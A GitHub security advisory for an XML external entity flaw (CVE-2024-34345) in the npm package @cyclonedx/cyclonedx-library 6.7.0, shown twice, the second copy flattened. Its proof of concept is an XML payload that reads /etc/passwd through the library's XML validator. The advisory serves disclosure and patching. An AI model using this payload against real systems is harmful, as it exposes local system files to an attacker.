Headline
GHSA-38gf-rh2w-gmj7: @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability
Impact
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.
POC
const {
Spec: { Version },
Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');
const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
<components>
<component type="library">
<name>testing</name>
<version>1.337</version>
<licenses>
<license>
<id>&xxe;</id><!-- << XML external entity (XXE) injection -->
</license>
</licenses>
</component>
</components>
</bom>`;
// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
console.error('validation error', ve);
});
Patches
This issue was fixed in @cyclonedx/[email protected].
Workarounds
Do not run the provided XML validator on untrusted inputs.
References
- issue was introduced via https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063.
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2024-34345
@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability
Package
npm @cyclonedx/cyclonedx-library (npm)
Affected versions
= 6.7.0
Impact
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.
POC
const { Spec: { Version }, Validation: { XmlValidator } } = require(‘@cyclonedx/cyclonedx-library’);
const version = Version.v1dot5; const validator = new XmlValidator(version); const input = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <bom xmlns="http://cyclonedx.org/schema/bom/1.5"> <components> <component type="library"> <name>testing</name> <version>1.337</version> <licenses> <license> <id>&xxe;</id><!-- << XML external entity (XXE) injection --> </license> </licenses> </component> </components> </bom>`;
// validating this forged(^) input might lead to unintended behaviour // for the fact that the XML external entity would be taken into account. validator.validate(input).then(ve => { console.error('validation error’, ve); });
Patches
This issue was fixed in @cyclonedx/[email protected] .
Workarounds
Do not run the provided XML validator on untrusted inputs.
References
- issue was introduced via CycloneDX/cyclonedx-javascript-library#1063.
References
- GHSA-38gf-rh2w-gmj7
- CycloneDX/cyclonedx-javascript-library#1063
- CycloneDX/cyclonedx-javascript-library@5e5e1e0
Published to the GitHub Advisory Database
May 8, 2024